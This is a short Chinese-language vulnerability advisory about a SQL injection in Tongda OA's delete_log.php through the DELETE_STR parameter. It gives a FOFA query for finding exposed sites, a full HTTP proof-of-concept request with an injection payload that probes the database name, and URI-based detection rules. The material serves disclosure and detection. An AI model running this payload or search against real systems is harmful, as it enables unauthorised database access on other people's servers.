1、漏洞描述

?通達OA中發現一個漏洞，并被列為嚴重漏洞。該漏洞影響文件general/system/seal_manage/dianju/delete_log.php的未知代碼。對參數 DELETE_STR 的操作會導致 sql 注入。

2、影響范圍

? 通達OA版本11.10之前

3、復現環境

?FOFA搜索：app="TDXK-通達OA" && icon_hash="-759108386"，發現漏洞網站

4、POC

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1) and (substr(DATABASE(),2,1))=char(68) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4n867pmrrp4nendg0tsngl7g70; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c74d7ebb
Connection: close

5、檢測思路

?-數據源：Web訪問流量日志

?-檢測邏輯：

? -and:

??? -uri 包含 ‘/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=’

??? -uri 包含 'from'

??? -or:

??????? -uri 包含 'select'

??????? -uri 包含 'delete'

??????? -uri 包含 'update'??????